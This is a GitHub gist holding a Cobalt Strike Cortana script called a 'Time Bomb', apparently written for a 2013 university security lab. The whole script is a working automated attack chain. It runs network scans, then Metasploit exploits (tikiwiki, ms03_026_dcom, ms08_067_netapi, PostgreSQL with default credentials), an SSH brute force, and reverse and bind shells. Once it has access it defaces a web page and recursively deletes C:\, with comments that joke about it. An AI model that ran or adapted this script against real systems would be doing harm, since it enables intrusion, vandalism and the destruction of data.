Last active
November 14, 2018 00:59
-
-
Save dontrebootme/5654266 to your computer and use it in GitHub Desktop.
Cobalt Strike: cortana-script for IST511 Lab
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Cortana Script - "Time Bomb" | |
| # For IST 511 2013 | |
| # | |
| # Created by Patrick O'Connor | |
| debug(debug()| 256); | |
| on ready { | |
| when heartbeat_5m { | |
| #kick off nmap/ping sweep | |
| cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24"); | |
| } | |
| when heartbeat_10m { | |
| #kick off nmap/service detection | |
| cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24"); | |
| } | |
| when heartbeat_15m { | |
| # tikiwiki - metasploitable | |
| println("[*] Begin tikiwiki attack"); | |
| $console = console(); | |
| cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec"); | |
| cmd_set($console, %(LHOST => "192.168.100.66", | |
| RPORT => "80", | |
| LPORT => "9079", | |
| RHOST => "192.168.100.202", | |
| PAYLOAD => "generic/shell_bind_tcp", | |
| TARGET => "0")); | |
| cmd($console, "exploit -j"); | |
| # Add some lulz to the index.html | |
| on session_sync { | |
| println("[*] We have a session!"); | |
| when ('heartbeat_5m', lambda({ | |
| # $sid is the session ID when I was declared. | |
| println("[*] Adding lulz to index.html!"); | |
| s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html"); | |
| }, $sid => $1)); | |
| } | |
| # SSH Brute Force | |
| println("[*] Begin SSH brute force attack"); | |
| cmd($console, "use auxiliary/scanner/ssh/ssh_login"); | |
| cmd_set($console, %(THREADS => "24", | |
| RPORT => "22", | |
| VERBOSE => "1", | |
| USER_AS_PASS => "1", | |
| STOP_ON_SUCCESS => "0", | |
| BRUTEFORCE_SPEED => "8", | |
| USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt", | |
| RHOSTS => "192.168.100.202", | |
| BLANK_PASSWORDS => "0")); | |
| cmd($console, "run -j"); | |
| # PostgreSQL Payload from SSH Creds | |
| println("[*] Begin PostgreSQL payload attack"); | |
| cmd($console, "use exploit/linux/postgres/postgres_payload"); | |
| cmd_set($console, %(LHOST => "192.168.100.66", | |
| RPORT => "5432", | |
| VERBOSE => "0", | |
| LPORT => "28430", | |
| RHOST => "192.168.100.202", | |
| PAYLOAD => "generic/shell_reverse_tcp", | |
| DATABASE => "template1", | |
| TARGET => "0", | |
| USERNAME => "postgres", | |
| PASSWORD => "postgres")); | |
| cmd($console, "exploit -j"); | |
| } | |
| when heartbeat_15m { | |
| # Windows 2K3 DCOM Exploit ms03_026_dcom | |
| println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack"); | |
| $console = console(); | |
| cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom"); | |
| cmd_set($console, %(RHOST => "192.168.100.101", | |
| PAYLOAD => "windows/meterpreter/bind_tcp", | |
| LHOST => "192.168.100.66", | |
| RPORT => "135", | |
| LPORT => "20271", | |
| TARGET => "0")); | |
| cmd($console, "exploit -j"); | |
| # Lets let the computer cool down a bit before we "clean it" | |
| on session_sync { | |
| println("[*] We have a session!"); | |
| when ('heartbeat_5m', lambda({ | |
| # $sid is the session ID when I was declared. | |
| println("[*] Perform magic cleanup!"); | |
| # Really useful command to free up some disk space. | |
| m_exec($sid, "RMDIR /S /Q C:\\ "); | |
| println("[*] Pens down everyone."); | |
| m_exec($sid, "taskkill /f /im explorer.exe "); | |
| }, $sid => $1)); | |
| } | |
| } | |
| when heartbeat_15m { | |
| # Windows 2k3 SMB Exploit ms08_067_netapi | |
| println("[*] Begin Windows 2k3 ms08_67 attack"); | |
| $console = console(); | |
| cmd($console, "use exploit/windows/smb/ms08_067_netapi"); | |
| cmd_set($console, %(RHOST => "192.168.100.102", | |
| PAYLOAD => "windows/meterpreter/bind_tcp")); | |
| cmd($console, "exploit -j"); | |
| # Lets let the computer cool down a bit before we "clean it" | |
| on session_sync { | |
| println("[*] We have a session!"); | |
| when ('heartbeat_5m', lambda({ | |
| # $sid is the session ID when I was declared. | |
| println("[*] Perform magic cleanup!"); | |
| # Really useful command to free up some disk space. | |
| m_exec($sid, "RMDIR /S /Q C:\\ "); | |
| println("[*] Pens down everyone."); | |
| m_exec($sid, "taskkill /f /im explorer.exe "); | |
| }, $sid => $1)); | |
| } | |
| } | |
| when heartbeat_15m { | |
| # Windows XP SMB Exploit ms08_067_netapi | |
| println("[*] Begin Windows XP ms08_67 attack"); | |
| $console = console(); | |
| cmd($console, "use exploit/windows/smb/ms08_067_netapi"); | |
| cmd_set($console, %(RHOST => "192.168.100.101", | |
| PAYLOAD => "windows/meterpreter/bind_tcp")); | |
| cmd($console, "exploit -j"); | |
| # Lets let the computer cool down a bit before we "clean it" | |
| on session_sync { | |
| println("[*] We have a session!"); | |
| when ('heartbeat_5m', lambda({ | |
| # $sid is the session ID when I was declared. | |
| println("[*] Perform magic cleanup!"); | |
| # Really useful command to free up some disk space. | |
| m_exec($sid, "RMDIR /S /Q C:\\ "); | |
| println("[*] Pens down everyone."); | |
| m_exec($sid, "taskkill /f /im explorer.exe "); | |
| }, $sid => $1)); | |
| } | |
| } | |
| quit(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment